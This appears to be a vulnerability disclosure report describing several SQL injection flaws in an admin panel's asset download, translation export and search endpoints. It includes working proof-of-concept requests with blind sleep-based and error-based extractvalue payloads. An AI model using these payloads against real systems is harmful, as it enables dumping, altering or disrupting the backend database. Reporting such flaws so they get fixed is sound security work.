Description

multiple sql injections due to unsanitized concatenating strings into where clause

Collaborator: @ub3rsick

Proof of Concept - assets controller

1- to trigger the request for sqli: go to files -> assets -> select a folder -> right click -> download as zip 2- replay the request to /admin/asset/download-as-zip-add-files and injection point is parameter selectedIds

exploitation is blind and you can induce a sleep with request like the following:

GET /admin/asset/download-as-zip-add-files?_dc=1679556461362&id=287&selectedIds=1,4,1+and+sleep(4)+or+1,2&offset=10&limit=5&jobId=641bfd26c1d25 HTTP/1.1

Proof of Concept - translations controller

/admin/translation/export?domain=messages&searchString=er&domain=messages&filter=[{"property":"Type=1+or+extractvalue(rand(),concat(0x3a,version()))--+-","value":"ee","type":"string"}]

Proof of Concept - search controller

GET /admin/search/search/find?_dc=1679542590358&type=document&query=e&subtype=page&context=%7B%22scope%22%3A%22globalSearch%22%7D&page=1&start=0&limit=50&class=CustomerSegmentGroup&property=key&filter=[{"property":"key"}]&fields[]=Bodywork_CAR+`o_id`on+`fieldname`))+or+extractvalue(rand(),concat(0x3a,version()))--+---+-~

Impact

dump database, alter data or perform dos on the backend dbms